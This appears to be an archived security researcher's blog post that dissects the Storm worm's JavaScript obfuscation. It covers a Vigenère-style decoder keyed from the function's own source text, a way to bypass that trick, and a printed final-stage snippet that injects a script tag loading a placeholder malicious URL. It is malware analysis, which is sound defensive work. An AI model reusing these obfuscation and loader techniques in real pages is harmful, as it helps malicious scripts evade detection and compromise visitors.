Storm Worm Vigenère

Note: This entry has been restored from old archives.

A small hobby of mine to pick apart JavaScript/ECMA obfuscation such as that used by the Zhelatin/Storm/Nuwar “worm”. My usual approach, which is certainly inefficient, is to grok the actual code by translating it to Perl. I’ve written about this before in “Someone Doesn’t Like Kaspersky“.

I don’t usually have time, after wasting much in the process of grokking, to write about these critters and I don’t expect that to change much! Time is so hard to come by! But after looking at some of the code with recent Storm mailings I think it’s worth noting the evolution.

The previous obfuscation I’ve written about is simple application of “xor encryption”, and much of what I’ve seen has been a variation on this at a similar level of simplicity.

The basic xor case worked along the lines of the following pattern.

    function decode(A,B) {
        ...
        eval(C);
    }
    decode(ciphertext,key);

In this case the key (and thus ciphertext) value was randomly generated for different visits to the page. In the decode function B is applied byte-by-byte to A to gain the plaintext C. Usually this processing was xor (^) and was further complicated with a URI decode or something of that ilk.

The sample I have looked at most recently has the following form.

    function X(Y) {
        ...
        eval(Z);
    }
    X(payload);

The key differences are that the function name (X) is now a variable and the obvious key input is gone, which hints at something. What’s changed inside the code? Well, working from the final decrypt up to the start of the function, this is what happens (somewhat simplified, but this is the core pattern):

  1. An array of 8 bytes is used as a key to shift the values in the input array in the manner of a classic Vigenère cipher applied mod-256).
  2. The key array is obtained be encoding a 32 bit value (i.e. 2309737967) to hex (0x89ABCDEF) and using the ASCII value of each hex digit to populate the key array ([56, 57, 65, 66, 67, 68, 69, 70).
  3. The 32 bit value is obtained by condensing an array of 256 integers (array256) and the text of the decode function (funcText) into an integer! The method iterates over characters in funcText using the byte values as lookup indexes in array256. Complete detail: key=0xFFFFFFFF; then for i in 0 to length(funcText) do:
    key=(array256[(key^funcText[i]) & 0xFF] ^ ((key >> 8) & 0xFFFFFF))
  4. The text of the decode function is obtained with arguments.callee.toString(), which has non-word chars stripped out and is converted to all-caps. Thus the importance of the function name X as an input parameter to the obfuscation, it doesn’t stop there as the text for the rest of the function body is also part of this key material and is full of randomised variable names. As you may have guessed, is is the random function and variable names that change from one downloading of the script to another — rather than just the xor key.
  5. The array of 256 integers is generated from a simple algorithm with a seed value, no need to detail it I think. It’s worth observing that between the different downloads of the script I saw the effective seed value didn’t change so this array remained constant.

Certainly much more complicated than the old xor code! But, I’d hope, a waste of time — since AV suspicious-script detection should work off generic patterns visible in the script from inspection rather than relying on the variable details. Still, only 3 AV engines on virustotal.com thought this script was worth noting as “generic obfuscated HTML”, but I don’t know what script/browser components they have enabled so I wouldn’t trust these out-of-context results. Many AV products exhibit different, usually more paranoid, behaviour when scanning in-browser data and HTTP at the gateway. And, looking at the whole Storm picture, this little snippet of code is just part of the delivery mechanism, it’s more important that the actual browser exploits and malware executables are caught!

Anyway, back to the script, this thing unwraps like a matryoshka doll. The plaintext is the same algorithm over again with new randomly generated function/variable names and a new ciphertext. The new ciphertext is much shorter though and after decoding we’re finished with this sample. The end result is javascript that generates a script DOM element and appends this to the document.

    var script = document.createElement("script");

    script.setAttribute("language", "JavaScript");
    script.setAttribute("src", "<nasty_local_url>");

    document.body.appendChild(script);

The most interesting item is the sample is this use of arguments.callee.toString() as key material. No doubt a direct defence against the usual malware-researcher practice of changing the final eval into an alert to expose the plaintext. While an admirable attempt at making life harder for researchers it’s not difficult to circumvent, just create a new variable assigned to the text “function X(Y) { ... }” and use this in place of the arguments.callee.toString() and good old alert should do it’s usual trick (then unwrap the next shell of the matryoshka). (Yes, “function” all that are included, though braces/punctuation don’t matter in the samples I have since an s/W//g is applied to the text)

The other “new technology” here is intriguing but not remarkable, using Vigenère instead of xor seems a curiosity more than a real advance (they’re certainly not doing it to hide the tell-tale use of the xor operator in a loop since they use xor in the key generation loops). Honestly, is looks just like some geek having fun, like me… but in this case we have a bad geek. Tut tut.

I’ve put a de-obfuscated and commented version of the script code up as well as a page containing active JavaScript that demonstrates the code. (Don’t worry, the active page’s payload is just an “alert” call!)